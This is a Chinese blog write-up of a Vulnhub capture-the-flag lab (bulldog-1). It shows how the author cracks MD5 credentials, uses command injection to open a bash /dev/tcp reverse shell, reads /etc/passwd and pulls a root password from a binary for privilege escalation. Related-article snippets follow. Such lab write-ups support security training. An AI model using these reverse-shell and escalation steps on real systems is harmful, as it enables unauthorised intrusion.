Vulnhub靶场第三关

最新推荐文章于 2022-05-10 10:21:53 发布
最新推荐文章于 2022-05-10 10:21:53 发布
阅读量262 收藏
点赞数 1
分类专栏: Vulnhub靶场第三关 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L1928/article/details/108285717
版权

Vulnhub靶场 bulldog-1
目标:
获得root权限和flflag。
运行环境:
靶机:用VirtualBox启动虚机,导入镜像,网络连接方式设置为桥接到无线网卡。靶机启动后,自动获得IP:
172.20.10.7。
Windows攻击机:物理机,连接无线网卡,自动获取IP:172.20.10.5,安装有Burpsuit、nc、Python2.7、
DirBuster等渗透工具。
Kali攻击机:VMWare启动虚机,桥接到无线网卡,自动获取IP:172.20.10.6。攻击机二选一即可。
渗透攻击:
1.使用nmap扫描ip192.168.1.158
在这里插入图片描述
2.发现端口开启
那么直接访问这个ip
访问成功
在这里插入图片描述
3.没有发现可用信息,进行目录爆破
通过对爆破到的目录进行访问发现了一个登录页面
在这里插入图片描述
4.查看dev 页面
在这里插入图片描述
5.查看页面源码后发现md5加密的代码
在这里插入图片描述
6.进行解码
账号密码:nick--------bulldog
账号密码:sarah-------bulldoglover
7.尝试登录
在这里插入图片描述
登录成功
8.发现可以执行命令
开启nc监听
nc -lvnp 6666
Web-shell输入
echo “bash -i >& /dev/tcp/192.168.1.29/6666 0>&1” | bash
等待监听成功
输入:python -c ‘import pty;pty.spawn("/bin/bash")’
反弹交互式shell成功
在这里插入图片描述
9.
查看系统用户 cat /etc/passwd
查看那些用户值得关注
进入这些用户cd进入
查看当前目录下的所有文件的详细信息,并且查看所有隐藏文件 ls -al
查看可执行文件中的字符串 strings 可执行文件名 查看密码
在这里插入图片描述
执行 Sudo python -c 'import pty;pty.spawn("/bin/bash")'命令
因为sudo只有超级用户才能执行所以会提示输入密码.
输入密码:SUPERultimatePASSWORDyouCANTget
权限提升成功:
在这里插入图片描述
补充:
Sodu -i 为了频繁的执行某些只有超级用户才能执行的权限,而不用每次输入密码,可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。执行该命令后提示符变为“#”而不是“$”。想退回普通账户时可以执行“exit”或“logout” 。

L无所不能
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bulldog1——爆破、命令执行、pty提权
KUKULI233的博客
06-25 495
1.收集信息 netdiscover,是一个二层工具,原理是数据包产生交互即判定主机存活 netdiscover -i eth0 -r 192.168.249.0/24 靶机: 端口扫描 Masscan --rate=100000 -p 0-65535 192.168.249.137 (判断出目标是137) –rate发包数 –ports指定端口数 查看端口服务 Nmap -T4 -sV -O -p 8080,80,23 192.168.249.137 -sV服务版本 -T4速度(最高为5,推荐用4)
ctf实战 掌控安全靶场 第三关通关记录
wh1te 小白的博客
09-20 3418
掌控安全封神台第三关  根据题目可能要用burp进行抓包,点击传送门进入题目主页 之前题目说的扫描到新的后台地址admin123 在网址后加入admin123 进入新的后台管理页面 根据第二关得到的用户和密码进行登录  进入后得到这样一个页面 抓包结果如下 根据代码分析只需要修改host和referer的ip地址 修改以后结果还是进不去 分析一下问题  打开F...
sudo命令中python提权
qq_40898302的博客
05-10 4060
python的提权
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7206
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Vulnhub-Bulldog1 靶机渗透
Majula
02-01 571
WalkthroughDownloadDescriptionPen TestingScanningExploitationPrivilege EscalationSolution ISolution IIReview Download BULLDOG: 1 - VlunHub VM 镜像文件。 这里 VM 我导入配置失败,分配不了 IP,建议用 VirtualBox,因为靶机默认模式是桥接,攻击机也要设为桥接模式。 我是 VM 运行 Kali,VirtualBox 运行靶机,如果你是这种情况,为了更加直观,
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub靶场题解.html
08-12
Vulnhub靶场题解.,适合渗透测试人员学习交流
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
【渗透测试】靶机渗透Vulnhub-bulldog
SunnyCat
06-01 2506
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
vulnhub靶机bulldog渗透笔记
liver100day的博客
05-18 267
bulldog靶机渗透笔记 靶机环境搭建 攻击渗透机:kali IP地址:192.168.75.128 靶机:bulldog ip地址:未知 靶机下载链接:https://download.vulnhub.com/bulldog/bulldog.ova 在这里就不介绍虚拟机的安装方式了,但是要记得把攻击机和靶机的网络连接方式都改为桥接模式 渗透过程 1.信息收集 netdiscover 来确认目标靶机IP地址,会扫描出同网段中除本机外的其他存活主机 ...
VulnHub渗透测试实战靶场 - Bulldog: 1
LYJ20010728的博客
08-05 469
VulnHub渗透测试实战靶场 - Bulldog: 1环境下载Bulldog: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Bulldog: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 获取到IP地址为:192.168.56.101 渗透测试 信
vulnhub渗透系列之bulldog
来到了学渣的博客
01-20 1669
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结: 1. 对端口信息扫描、信息的收集 2. 用dirb扫出了许多关键目录 3. 仔细观察每一个细节,这个靶机主要在/dev目录处前端源码泄露了MD5密码信息 4. 登录了管理员账号后可以在/dev/shell页面利用命令注入漏洞 5. 搭建临时...
vulnhub靶场bulldog1
kukudeshuo的博客
08-12 243
vulnhub靶场bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128) 靶机:bulldog1(192.168.109.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.157 使用nmap扫描查看目标靶机端口开放
Vulnhub靶场渗透练习(三) bulldog
weixin_30563917的博客
07-08 192
拿到靶场后先对ip进行扫描 获取ip 和端口 针对项目路径爆破 获取两个有用文件 http://192.168.18.144/dev/ dev,admin 更具dev 发现他们用到框架和语言 找到一个 shell 连接 http://192.168.18.144/dev/shell/ 反健源码 查看可以看到 丢入md5 网站解密 成功的解密2...
DC 靶机
niqiu320的博客
05-12 3872
DC-1实战 大致流程(copy博客为lainwith的) 环境kali 1、首先ifconfig 得知ip为192.168.149.xxx/ 2、局域网探测arp-scan -l 得知靶机ip为192.168.149.147 3、扫描端口nmap -sV -p- 192.168.149.147,查看端口信息,得知80端口开放,浏览器访问80端口查看 4、目录遍历dirb http://192.168.149.147,无可用信息 5.、启动Metersploit来查看漏洞并利用漏洞msfconsole 6
python3 -c ‘import pty;pty.spawn(“/bin/bash“)‘升级切换交互式shell
sweelg的博客
02-28 3678
python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty -a stty raw -echo;fg reset stty rows 29 columns 94 row和columns数据为stty -a后的数据
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值